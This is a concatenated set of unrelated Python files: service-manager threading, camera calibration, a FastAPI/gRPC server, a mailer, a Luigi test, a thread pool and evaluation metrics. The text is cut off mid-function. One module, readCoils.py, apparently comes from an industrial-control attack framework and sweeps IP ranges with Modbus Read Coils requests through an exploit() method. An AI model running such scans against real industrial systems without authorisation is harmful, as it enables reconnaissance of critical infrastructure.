# ------------------------------------------------------------------
def add_thread(self, target):
"""add thread to the general registry
"""
trd = threading.Thread(target=target)
ServiceManager.threads += [{
'target': target,
'trd': trd,
}]
return
# ------------------------------------------------------------------
@classmethod
def get_threads(self):
return ServiceManager.threads
# ------------------------------------------------------------------
@classmethod
def run_threads(self):
"""run all threads and block untill they all finish
"""
for thread in ServiceManager.threads:
thread['trd'].start()
for thread in ServiceManager.threads:
thread['trd'].join()
return
# ------------------------------------------------------------------
def has_active_instance(self):
"""will return None is there is no active instance, otherwise, will return
the initialisation state
"""
return self.redis.get(self.active_instance_name)
# ------------------------------------------------------------------
def set_active_instance(self, has_init, expire_sec):
self.redis.set(
name=self.active_instance_name,
data=has_init,
expire_sec=int(expire_sec),
)
return
# ------------------------------------------------------------------
@classmethod
def unset_active_instance(self, parent, service_name):
active_instance_name = ServiceManager.get_active_name(service_name=service_name)
if parent.redis.exists(active_instance_name):
parent.log.info([
['r', ' - unset_active_instance '],
['y', active_instance_name],
['r', ' ...'],
])
parent.redis.delete(name=active_instance_name)
return
# ------------------------------------------------------------------
def init_active_instance(self):
if self.has_active_instance() is not None:
# sleep for a bit
sleep(self.active_expire_sec)
# try again for n_sec_try
n_sec_try = 3
for _ in range(n_sec_try):
if self.has_active_instance() is None:
break
sleep(1)
# if the instance is still locked, something must be wrong
if self.has_active_instance() is not None:
raise Exception(
'Can not instantiate an active instance more than once...',
self.active_instance_name,
)
# register the heartbeat thread
self.add_thread(target=self.loop_active_heartbeat)
return
# ------------------------------------------------------------------
def loop_active_heartbeat(self):
"""heartbeat loop running in its own thread, updating the expiration
of the active instance
"""
self.log.info([
['g', ' - starting loop_active_heartbeat '],
['y', self.active_instance_name],
['g', ' ...'],
])
# set the active instance once, in order to satisfy can_loop()
self.set_active_instance(has_init=False, expire_sec=self.active_expire_sec)
while self.can_loop():
self.set_active_instance(
has_init=True,
expire_sec=self.active_expire_sec,
)
sleep(self.loop_active_expire_sec)
self.log.info([
['c', ' - ending loop_active_heartbeat '],
['y', self.active_instance_name],
['c', ' ...'],
])
return
|
checkerpoint_correspondence_generator.py
|
import numpy as np
import pickle
import cv2
import glob
import os
import argparse
from multiprocessing import Process, Manager
def parallization_function(args, i, filename, global_objpts, global_imgpts, global_mark):
ncols = args.nsquare_x - 1
nrows = args.nsquare_y - 1
# termination criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objpts = np.zeros((ncols * nrows, 3), np.float32)
objpts[:, :2] = np.mgrid[0:ncols, 0:nrows].T.reshape(-1, 2)*10
print("{0}) Reading {1}".format(i + 1, filename))
image = cv2.imread(filename)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
height, width = gray.shape
# if(height>width):
# gray = cv2.rotate(gray, cv2.ROTATE_90_CLOCKWISE)
# Find the chess board corners
ret, corners = cv2.findChessboardCorners(gray, (ncols, nrows), None)
# If found, add object points, image points (after refining them)
if ret:
global_objpts[i] = (objpts)
refined_corners = cv2.cornerSubPix(gray, corners, (11, 11), (-1, -1), criteria)
global_imgpts[i] = refined_corners
global_mark[i] = True
if args.visualize:
# Draw and display the corners
scale = 1.0
draw = cv2.resize(image, None, fx=scale, fy=scale)
draw = cv2.drawChessboardCorners(draw, (ncols, nrows), refined_corners * scale, ret)
cv2.namedWindow(filename, cv2.WINDOW_NORMAL)
cv2.imshow(filename, draw)
cv2.waitKey(0)
print("{0}) Completed {1}".format(i + 1, filename))
def process(args):
# Arrays to store object points and image points from all the images.
objpts_list = list() # 3d point in real world space
imgpts_list = list() # 2d points in image plane.
images = glob.glob(os.path.join(args.images_dir, "*.jpg"))
with Manager() as manager:
global_objpts = manager.list(range(len(images))) # <-- can be shared between processes.
global_imgpts = manager.list(range(len(images))) # <-- can be shared between processes.
global_mark = manager.list([False for _ in range(len(images))]) # <-- can be shared between processes.
processes = []
for i, filename in enumerate(images):
p = Process(target=parallization_function, args=(args, i, filename,global_objpts, global_imgpts, global_mark)) # Passing the list
p.start()
processes.append(p)
for p in processes:
p.join()
for ind in range(len(images)):
if global_mark[ind]:
objpts_list.append(global_objpts[ind])
imgpts_list.append(global_imgpts[ind])
if args.visualize:
cv2.destroyAllWindows()
for i, filename in enumerate(images):
print("{0}) Reading {1}".format(i + 1, filename))
image = cv2.imread(filename)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
if args.output_dir is not None:
with open(os.path.join(args.output_dir, "data_rotation_fixed_vert_temp.pkl"), "wb") as f:
data = (objpts_list, imgpts_list, gray.shape)
pickle.dump(data, f)
ret, camera_matrix, dist_coeffs, rvecs, tvecs = cv2.calibrateCamera(objpts_list, imgpts_list, gray.shape, None, None)
print("camera matrix: {}".format(camera_matrix))
print("distortion coefficients: {}".format(dist_coeffs))
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--images_dir',
type=str,
required=True,
help="Directory contains images.")
parser.add_argument(
'--output_dir',
type=str,
default=None,
help="Directory to save results.")
parser.add_argument(
'--nsquare_x',
type=int,
default=7,
help="Number of squares in x direction.")
parser.add_argument(
'--nsquare_y',
type=int,
default=10,
help="Number of squares in y direction.")
parser.add_argument(
'--visualize',
type=bool,
default=False,
help="Visualize detected checkerboard corners.")
args = parser.parse_args()
process(args)
if __name__ == '__main__':
main()
|
server.py
|
import os
import logging
import json
import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
import grpc
from google.protobuf import any_pb2
import sys
import time
from threading import Thread
import redis
import cache
import service_pb2
import service_pb2_grpc
class ProcessItem(BaseModel):
user_id: str
clicked_item_ids: list = []
app = FastAPI()
# Mandatory variables in envirnment
MANDATORY_ENV_VARS = {
'REDIS_HOST' : 'localhost',
'REDIS_PORT' : 6379,
'PORTRAIT_PORT': 5300
}
sleep_interval = 10 #second
pickle_type = 'inverted-list'
action_model_type = 'action-model'
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
@app.get('/portrait/status', tags=["monitoring"])
def status():
logging.info('Collecting status information from server & plugin...')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
statusAny = any_pb2.Any()
response.status.Unpack(statusAny)
pStatus = json.loads(statusAny.value.decode('utf-8'))
return {
'env': MANDATORY_ENV_VARS,
'redis': rCache.connection_status(),
'plugin_status': pStatus
}
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request')
return {
"result": "pong"
}
@app.get('/portrait/userid/{user_id}', tags=["portrait"])
async def get_portrait(user_id: str):
logging.info('Searching %s - user portrait from cache ...', user_id)
# Get data from plugin service
gPortraitRequest = service_pb2.GetPortraitRequest(apiVersion='v1',
metadata='Portrait', type='GetPortrait', userId=user_id)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.GetPortrait(gPortraitRequest)
results = any_pb2.Any()
response.results.Unpack(results)
results = any_pb2.Any()
response.results.Unpack(results)
resultJson = json.loads(results.value, encoding='utf-8')
return {
'code': response.code,
'description': response.description,
'results': resultJson
}
@app.post('/portrait/process', tags=["portrait_to_plugin"])
def update_portrait(processItem: ProcessItem):
logging.info('Start update_portrait() ...')
user_id = processItem.user_id
clicked_item_ids = processItem.clicked_item_ids
logging.info('user_id -> %s', user_id)
logging.info('clicked_item_ids -> %s', clicked_item_ids)
reqDicts = any_pb2.Any()
reqDicts.value = json.dumps({
'user_id': user_id,
'clicked_item_ids': clicked_item_ids
}).encode('utf-8')
logging.info('Invoke plugin to update portrait...')
updateRequest = service_pb2.UpdatePortraitRequest(apiVersion='v1',
metadata='Portrait', type='UpdatePortrait')
updateRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.UpdatePortrait(updateRequest)
results = any_pb2.Any()
response.results.Unpack(results)
resultJson = json.loads(results.value, encoding='utf-8')
return {
'code': response.code,
'description': response.description,
'results': resultJson
}
def read_stream_messages():
logging.info('read_stream_messages start')
read_pickle_message()
read_action_model_message()
@xasync
def read_action_model_message():
logging.info('read_action_model_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(action_model_type)
if stream_message:
logging.info("Handle existed stream action_model_type message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading action_model_type message')
try:
stream_message = rCache.read_stream_message_block(action_model_type)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
@xasync
def read_pickle_message():
logging.info('read_pickle_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(pickle_type)
if stream_message:
logging.info("Handle existed stream pickle_type message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading pickle_type message')
localtime = time.asctime( time.localtime(time.time()))
logging.info('start read stream: time: {}'.format(localtime))
try:
stream_message = rCache.read_stream_message_block(pickle_type)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
def handle_stream_message(stream_message):
logging.info('get stream message from {}'.format(stream_message))
file_type, file_path, file_list = parse_stream_message(stream_message)
logging.info('start reload data process in handle_stream_message')
logging.info('file_type {}'.format(file_type))
logging.info('file_path {}'.format(file_path))
logging.info('file_list {}'.format(file_list))
reqDicts = any_pb2.Any()
reqDicts.value = json.dumps({
'file_type': file_type,
'file_list': file_list
}).encode('utf-8')
reloadRequest = service_pb2.ReloadRequest()
reloadRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.Reload(reloadRequest)
if response.code == 0:
logging.info('reload plugin succeeded')
else:
logging.info('reload plugin failed, description: {}'.format(response.description))
def parse_stream_message(stream_message):
for stream_name, message in stream_message:
for message_id, value in message:
decode_value = convert(value)
file_type = decode_value['file_type']
file_path = decode_value['file_path']
file_list = decode_value['file_list']
return file_type, file_path, file_list
# convert stream data to str
def convert(data):
if isinstance(data, bytes):
return data.decode('ascii')
elif isinstance(data, dict):
return dict(map(convert, data.items()))
elif isinstance(data, tuple):
return map(convert, data)
else:
return data
def check_plugin_status():
logging.info('check plugin status')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.PortraitStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
if response.code == 0:
logging.info('plugin startup succeed')
return True
else:
logging.info('plugin startup failed')
return False
def wait_for_plugin_service():
while True:
if check_plugin_status():
return
else:
logging.info('wait for plugin startup')
time.sleep( sleep_interval )
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error("Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var]=os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
wait_for_plugin_service()
logging.info('portrait start!')
read_stream_messages()
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=MANDATORY_ENV_VARS['PORTRAIT_PORT'])
|
message.py
|
from time import sleep
from marrow.mailer import Mailer
from sqlalchemy import Column, Unicode, UnicodeText, Integer
from config import admin_mail
import secret
from models.base_model import SQLMixin, db
from models.user import User
def configured_mailer():
config = {
# 'manager.use': 'futures',
'transport.debug': True,
'transport.timeout': 1,
'transport.use': 'smtp',
'transport.host': 'smtp.exmail.qq.com',
'transport.port': 465,
'transport.tls': 'ssl',
'transport.username': admin_mail,
'transport.password': secret.mail_password,
}
m = Mailer(config)
m.start()
return m
mailer = configured_mailer()
def send_mail(subject, author, to, content):
# 延迟测试
# sleep(30)
m = mailer.new(
subject=subject,
author=author,
to=to,
)
m.plain = content
mailer.send(m)
class Messages(SQLMixin, db.Model):
title = Column(Unicode(50), nullable=False)
content = Column(UnicodeText, nullable=False)
sender_id = Column(Integer, nullable=False)
receiver_id = Column(Integer, nullable=False)
@staticmethod
def send(title: str, content: str, sender_id: int, receiver_id: int):
form = dict(
title=title,
content=content,
sender_id=sender_id,
receiver_id=receiver_id
)
Messages.new(form)
receiver: User = User.one(id=receiver_id)
send_mail(
subject=title,
author=admin_mail,
to=receiver.email,
content='站内信通知:\n {}'.format(content),
)
# import threading
# form = dict(
# subject=form['title'],
# author=admin_mail,
# to=receiver.email,
# plain=form['content'],
# )
# t = threading.Thread(target=send_mail, kwargs=form)
# t.start()
# send_async.delay(
# subject=form['title'],
# author=admin_mail,
# to=receiver.email,
# plain=form['content']
# )
|
simulate_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest
import luigi
from luigi.contrib.simulate import RunAnywayTarget
from multiprocessing import Process
import os
import tempfile
def temp_dir():
return os.path.join(tempfile.gettempdir(), 'luigi-simulate')
def is_writable():
d = temp_dir()
fn = os.path.join(d, 'luigi-simulate-write-test')
exists = True
try:
try:
os.makedirs(d)
except OSError:
pass
open(fn, 'w').close()
os.remove(fn)
except BaseException:
exists = False
return unittest.skipIf(not exists, 'Can\'t write to temporary directory')
class TaskA(luigi.Task):
i = luigi.IntParameter(default=0)
def output(self):
return RunAnywayTarget(self)
def run(self):
fn = os.path.join(temp_dir(), 'luigi-simulate-test.tmp')
try:
os.makedirs(os.path.dirname(fn))
except OSError:
pass
with open(fn, 'a') as f:
f.write('{0}={1}\n'.format(self.__class__.__name__, self.i))
self.output().done()
class TaskB(TaskA):
def requires(self):
return TaskA(i=10)
class TaskC(TaskA):
def requires(self):
return TaskA(i=5)
class TaskD(TaskA):
def requires(self):
return [TaskB(), TaskC(), TaskA(i=20)]
class TaskWrap(luigi.WrapperTask):
def requires(self):
return [TaskA(), TaskD()]
def reset():
# Force tasks to be executed again (because multiple pipelines are executed inside of the same process)
t = TaskA().output()
with t.unique.get_lock():
t.unique.value = 0
class RunAnywayTargetTest(unittest.TestCase):
@is_writable()
def test_output(self):
reset()
fn = os.path.join(temp_dir(), 'luigi-simulate-test.tmp')
luigi.build([TaskWrap()], local_scheduler=True)
with open(fn, 'r') as f:
data = f.read().strip().split('\n')
data.sort()
reference = ['TaskA=0', 'TaskA=10', 'TaskA=20', 'TaskA=5', 'TaskB=0', 'TaskC=0', 'TaskD=0']
reference.sort()
os.remove(fn)
self.assertEqual(data, reference)
@is_writable()
def test_output_again(self):
# Running the test in another process because the PID is used to determine if the target exists
p = Process(target=self.test_output)
p.start()
p.join()
|
readCoils.py
|
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
import ipcalc
class Module:
info = {
'Name': 'Read Coils Function',
'Author': ['@enddo'],
'Description': ("Fuzzing Read Coils Function"),
}
options = {
'RHOSTS' :['' ,True ,'The target address range or CIDR identifier'],
'RPORT' :[502 ,False ,'The port number for modbus protocol'],
'UID' :[None ,True ,'Modbus Slave UID.'],
'StartAddr' :['0x0000' ,True ,'Start Address.'],
'Quantity' :['0x0001' ,True ,'Registers Values.'],
'Threads' :[1 ,False ,'The number of concurrent threads'],
'Output' :[True ,False ,'The stdout save in output directory']
}
output = ''
def exploit(self):
moduleName = self.info['Name']
print(bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start')
ips = list()
for ip in ipcalc.Network(self.options['RHOSTS'][0]):
ips.append(str(ip))
while ips:
for i in range(int(self.options['Threads'][0])):
if len(ips) > 0:
thread = threading.Thread(target=self.do, args=(ips.pop(0),))
thread.start()
THREADS.append(thread)
else:
break
for thread in THREADS:
thread.join()
if self.options['Output'][0]:
open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOSTS'][0].replace('/', '_') + '.txt', 'a').write('='*30 + '\n' + self.output + '\n\n')
self.output = ''
def printLine(self, str, color):
self.output += str + '\n'
if str.find('[+]') != -1:
print(str.replace('[+]', color + '[+]' + bcolors.ENDC))
elif str.find('[-]') != -1:
print(str.replace('[-]', color + '[+]' + bcolors.ENDC))
else:
print(str)
def do(self, ip):
c = connectToTarget(ip, self.options['RPORT'][0])
if c is None:
self.printLine('[-] Modbus is not running on : ' + ip, bcolors.WARNING)
return None
self.printLine('[+] Connecting to ' + ip, bcolors.OKGREEN)
ans = c.sr1(ModbusADU(transId=getTransId(), unitId=int(self.options['UID'][0]))/ModbusPDU01_Read_Coils(startAddr=int(self.options['StartAddr'][0], 16), quantity=int(self.options['Quantity'][0], 16)), timeout=timeout, verbose=0)
self.printLine('[+] Received response!', bcolors.OKGREEN)
# ans = mb.ModbusADUResponse(ans)
# ans = ModbusADU_Answer(ans)
# ans.show()
# TODO Show packet
|
threadpool.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Cached thread pool, inspired from Pelix/iPOPO Thread Pool
:author: Thomas Calmant
:copyright: Copyright 2015, isandlaTech
:license: Apache License 2.0
:version: 0.2.4
..
Copyright 2015 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Documentation strings format
__docformat__ = "restructuredtext en"
# Module version
__version_info__ = (0, 2, 4)
__version__ = ".".join(str(x) for x in __version_info__)
# ------------------------------------------------------------------------------
# Standard library
import logging
import threading
try:
# Python 3
# pylint: disable=F0401
import queue
except ImportError:
# Python 2
# pylint: disable=F0401
import Queue as queue
# ------------------------------------------------------------------------------
class EventData(object):
"""
A threading event with some associated data
"""
def __init__(self):
"""
Sets up the event
"""
self.__event = threading.Event()
self.__data = None
self.__exception = None
@property
def data(self):
"""
Returns the associated value
"""
return self.__data
@property
def exception(self):
"""
Returns the exception used to stop the wait() method
"""
return self.__exception
def clear(self):
"""
Clears the event
"""
self.__event.clear()
self.__data = None
self.__exception = None
def is_set(self):
"""
Checks if the event is set
"""
return self.__event.is_set()
def set(self, data=None):
"""
Sets the event
"""
self.__data = data
self.__exception = None
self.__event.set()
def raise_exception(self, exception):
"""
Raises an exception in wait()
:param exception: An Exception object
"""
self.__data = None
self.__exception = exception
self.__event.set()
def wait(self, timeout=None):
"""
Waits for the event or for the timeout
:param timeout: Wait timeout (in seconds)
:return: True if the event as been set, else False
"""
# The 'or' part is for Python 2.6
result = self.__event.wait(timeout) or self.__event.is_set()
# pylint: disable=E0702
# Pylint seems to miss the "is None" check below
if self.__exception is None:
return result
else:
raise self.__exception
class FutureResult(object):
"""
An object to wait for the result of a threaded execution
"""
def __init__(self, logger=None):
"""
Sets up the FutureResult object
:param logger: The Logger to use in case of error (optional)
"""
self._logger = logger or logging.getLogger(__name__)
self._done_event = EventData()
self.__callback = None
self.__extra = None
def __notify(self):
"""
Notify the given callback about the result of the execution
"""
if self.__callback is not None:
try:
self.__callback(self._done_event.data,
self._done_event.exception,
self.__extra)
except Exception as ex:
self._logger.exception("Error calling back method: %s", ex)
def set_callback(self, method, extra=None):
"""
Sets a callback method, called once the result has been computed or in
case of exception.
The callback method must have the following signature:
``callback(result, exception, extra)``.
:param method: The method to call back in the end of the execution
:param extra: Extra parameter to be given to the callback method
"""
self.__callback = method
self.__extra = extra
if self._done_event.is_set():
# The execution has already finished
self.__notify()
def execute(self, method, args, kwargs):
"""
Execute the given method and stores its result.
The result is considered "done" even if the method raises an exception
:param method: The method to execute
:param args: Method positional arguments
:param kwargs: Method keyword arguments
:raise Exception: The exception raised by the method
"""
# Normalize arguments
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
# Call the method
result = method(*args, **kwargs)
except Exception as ex:
# Something went wrong: propagate to the event and to the caller
self._done_event.raise_exception(ex)
raise
else:
# Store the result
self._done_event.set(result)
finally:
# In any case: notify the call back (if any)
self.__notify()
def done(self):
"""
Returns True if the job has finished, else False
"""
return self._done_event.is_set()
def result(self, timeout=None):
"""
Waits up to timeout for the result the threaded job.
Returns immediately the result if the job has already been done.
:param timeout: The maximum time to wait for a result (in seconds)
:raise OSError: The timeout raised before the job finished
:raise Exception: The exception encountered during the call, if any
"""
if self._done_event.wait(timeout):
return self._done_event.data
else:
raise OSError("Timeout raised")
# ------------------------------------------------------------------------------
class ThreadPool(object):
"""
Executes the tasks stored in a FIFO in a thread pool
"""
def __init__(self, max_threads, min_threads=1, queue_size=0, timeout=60,
logname=None):
"""
Sets up the thread pool.
Threads are kept alive 60 seconds (timeout argument).
:param max_threads: Maximum size of the thread pool
:param min_threads: Minimum size of the thread pool
:param queue_size: Size of the task queue (0 for infinite)
:param timeout: Queue timeout (in seconds, 60s by default)
:param logname: Name of the logger
:raise ValueError: Invalid number of threads
"""
# Validate parameters
try:
max_threads = int(max_threads)
if max_threads < 1:
raise ValueError("Pool size must be greater than 0")
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
try:
min_threads = int(min_threads)
if min_threads < 0:
min_threads = 0
elif min_threads > max_threads:
min_threads = max_threads
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
# The logger
self._logger = logging.getLogger(logname or __name__)
# The loop control event
self._done_event = threading.Event()
self._done_event.set()
# The task queue
try:
queue_size = int(queue_size)
except (TypeError, ValueError):
# Not a valid integer
queue_size = 0
self._queue = queue.Queue(queue_size)
self._timeout = timeout
self.__lock = threading.RLock()
# The thread pool
self._min_threads = min_threads
self._max_threads = max_threads
self._threads = []
# Thread count
self._thread_id = 0
# Current number of threads, active and alive
self.__nb_threads = 0
self.__nb_active_threads = 0
def start(self):
"""
Starts the thread pool. Does nothing if the pool is already started.
"""
if not self._done_event.is_set():
# Stop event not set: we're running
return
# Clear the stop event
self._done_event.clear()
# Compute the number of threads to start to handle pending tasks
nb_pending_tasks = self._queue.qsize()
if nb_pending_tasks > self._max_threads:
nb_threads = self._max_threads
elif nb_pending_tasks < self._min_threads:
nb_threads = self._min_threads
else:
nb_threads = nb_pending_tasks
# Create the threads
for _ in range(nb_threads):
self.__start_thread()
def __start_thread(self):
"""
Starts a new thread, if possible
"""
with self.__lock:
if self.__nb_threads >= self._max_threads:
# Can't create more threads
return False
if self._done_event.is_set():
# We're stopped: do nothing
return False
# Prepare thread and start it
name = "{0}-{1}".format(self._logger.name, self._thread_id)
self._thread_id += 1
thread = threading.Thread(target=self.__run, name=name)
thread.daemon = True
self._threads.append(thread)
thread.start()
return True
def stop(self):
"""
Stops the thread pool. Does nothing if the pool is already stopped.
"""
if self._done_event.is_set():
# Stop event set: we're stopped
return
# Set the stop event
self._done_event.set()
with self.__lock:
# Add something in the queue (to unlock the join())
try:
for _ in self._threads:
self._queue.put(self._done_event, True, self._timeout)
except queue.Full:
# There is already something in the queue
pass
# Copy the list of threads to wait for
threads = self._threads[:]
# Join threads outside the lock
for thread in threads:
while thread.is_alive():
# Wait 3 seconds
thread.join(3)
if thread.is_alive():
# Thread is still alive: something might be wrong
self._logger.warning("Thread %s is still alive...",
thread.name)
# Clear storage
del self._threads[:]
self.clear()
def enqueue(self, method, *args, **kwargs):
"""
Queues a task in the pool
:param method: Method to call
:return: A FutureResult object, to get the result of the task
:raise ValueError: Invalid method
:raise Full: The task queue is full
"""
if not hasattr(method, '__call__'):
raise ValueError("{0} has no __call__ member."
.format(method.__name__))
# Prepare the future result object
future = FutureResult(self._logger)
# Use a lock, as we might be "resetting" the queue
with self.__lock:
# Add the task to the queue
self._queue.put((method, args, kwargs, future), True,
self._timeout)
if self.__nb_active_threads == self.__nb_threads:
# All threads are taken: start a new one
self.__start_thread()
return future
def clear(self):
"""
Empties the current queue content.
Returns once the queue have been emptied.
"""
with self.__lock:
# Empty the current queue
try:
while True:
self._queue.get_nowait()
self._queue.task_done()
except queue.Empty:
# Queue is now empty
pass
# Wait for the tasks currently executed
self.join()
def join(self, timeout=None):
"""
Waits for all the tasks to be executed
:param timeout: Maximum time to wait (in seconds)
:return: True if the queue has been emptied, else False
"""
if self._queue.empty():
# Nothing to wait for...
return True
elif timeout is None:
# Use the original join
self._queue.join()
return True
else:
# Wait for the condition
with self._queue.all_tasks_done:
self._queue.all_tasks_done.wait(timeout)
return not bool(self._queue.unfinished_tasks)
def __run(self):
"""
The main loop
"""
with self.__lock:
self.__nb_threads += 1
while not self._done_event.is_set():
try:
# Wait for an action (blocking)
task = self._queue.get(True, self._timeout)
if task is self._done_event:
# Stop event in the queue: get out
self._queue.task_done()
with self.__lock:
self.__nb_threads -= 1
return
except queue.Empty:
# Nothing to do yet
pass
else:
with self.__lock:
self.__nb_active_threads += 1
# Extract elements
method, args, kwargs, future = task
try:
# Call the method
future.execute(method, args, kwargs)
except Exception as ex:
self._logger.exception("Error executing %s: %s",
method.__name__, ex)
finally:
# Mark the action as executed
self._queue.task_done()
# Thread is not active anymore
self.__nb_active_threads -= 1
# Clean up thread if necessary
with self.__lock:
if self.__nb_threads > self._min_threads:
# No more work for this thread, and we're above the
# minimum number of threads: stop this one
self.__nb_threads -= 1
return
with self.__lock:
# Thread stops
self.__nb_threads -= 1
|
evals.py
|
import numpy
import scipy.sparse as sp
import logging
from six.moves import xrange
from collections import OrderedDict
import sys
import pdb
from sklearn import metrics
from threading import Lock
from threading import Thread
import torch
import math
from pdb import set_trace as stop
import os
import pandas as pd
# import pylab as pl
from sklearn.metrics import roc_curve, auc
FORMAT = '[%(asctime)s] %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
LOGGER = logging.getLogger(__name__)
def list2sparse(A, n_labels=None):
if n_labels is None:
n_labels_ = 0
for a in A:
if n_labels_ < numpy.max(a):
n_labels_ = numpy.max(a)
n_labels = n_labels_
n_samples = len(A)
mat = sp.dok_matrix((n_samples, n_labels))
for idx in xrange(n_samples):
for item in A[idx]:
mat[idx, item] = 1
return mat.tocsr()
def is_sparse(matrix):
return sp.issparse(matrix)
def is_binary_matrix(matrix):
return numpy.all(numpy.logical_xor(matrix != 1, matrix != 0))
def sparse2dense(sparse_matrix):
""" convert a sparse matrix into a dense matrix of 0 or 1.
"""
assert sp.issparse(sparse_matrix)
return numpy.asarray(sparse_matrix.toarray())
def prepare_evaluation(targets, preds):
if is_sparse(targets):
targets = sparse2dense(targets)
if is_sparse(preds):
preds = sparse2dense(preds)
assert numpy.array_equal(targets.shape, preds.shape)
assert is_binary_matrix(targets)
assert is_binary_matrix(preds)
return (targets, preds)
def subset_accuracy(true_targets, predictions, per_sample=False, axis=0):
# print(true_targets.shape)
# print(predictions.shape)
result = numpy.all(true_targets == predictions, axis=axis)
if not per_sample:
result = numpy.mean(result)
return result
def hamming_loss(true_targets, predictions, per_sample=False, axis=0):
result = numpy.mean(numpy.logical_xor(true_targets, predictions),
axis=axis)
if not per_sample:
result = numpy.mean(result)
return result
def compute_tp_fp_fn(true_targets, predictions, axis=0):
# axis: axis for instance
tp = numpy.sum(true_targets * predictions, axis=axis).astype('float32')
fp = numpy.sum(numpy.logical_not(true_targets) * predictions,
axis=axis).astype('float32')
fn = numpy.sum(true_targets * numpy.logical_not(predictions),
axis=axis).astype('float32')
return (tp, fp, fn)
def example_f1_score(true_targets, predictions, per_sample=False, axis=0):
tp, fp, fn = compute_tp_fp_fn(true_targets, predictions, axis=axis)
numerator = 2*tp
denominator = (numpy.sum(true_targets,axis=axis).astype('float32') + numpy.sum(predictions,axis=axis).astype('float32'))
zeros = numpy.where(denominator == 0)[0]
denominator = numpy.delete(denominator,zeros)
numerator = numpy.delete(numerator,zeros)
example_f1 = numerator/denominator
if per_sample:
f1 = example_f1
else:
f1 = numpy.mean(example_f1)
return f1
def f1_score_from_stats(tp, fp, fn, average='micro'):
assert len(tp) == len(fp)
assert len(fp) == len(fn)
if average not in set(['micro', 'macro']):
raise ValueError("Specify micro or macro")
if average == 'micro':
f1 = 2*numpy.sum(tp) / \
float(2*numpy.sum(tp) + numpy.sum(fp) + numpy.sum(fn))
elif average == 'macro':
def safe_div(a, b):
""" ignore / 0, div0( [-1, 0, 1], 0 ) -> [0, 0, 0] """
with numpy.errstate(divide='ignore', invalid='ignore'):
c = numpy.true_divide(a, b)
return c[numpy.isfinite(c)]
f1 = numpy.mean(safe_div(2*tp, 2*tp + fp + fn))
return f1
def f1_score(true_targets, predictions, average='micro', axis=0):
"""
average: str
'micro' or 'macro'
axis: 0 or 1
label axis
"""
if average not in set(['micro', 'macro']):
raise ValueError("Specify micro or macro")
tp, fp, fn = compute_tp_fp_fn(true_targets, predictions, axis=axis)
f1 = f1_score_from_stats(tp, fp, fn, average=average)
return f1
def compute_aupr_thread(all_targets,all_predictions):
aupr_array = []
lock = Lock()
def compute_aupr_(start,end,all_targets,all_predictions):
for i in range(all_targets.shape[1]):
try:
precision, recall, thresholds = metrics.precision_recall_curve(all_targets[:,i], all_predictions[:,i], pos_label=1)
auPR = metrics.auc(recall,precision,reorder=True)
lock.acquire()
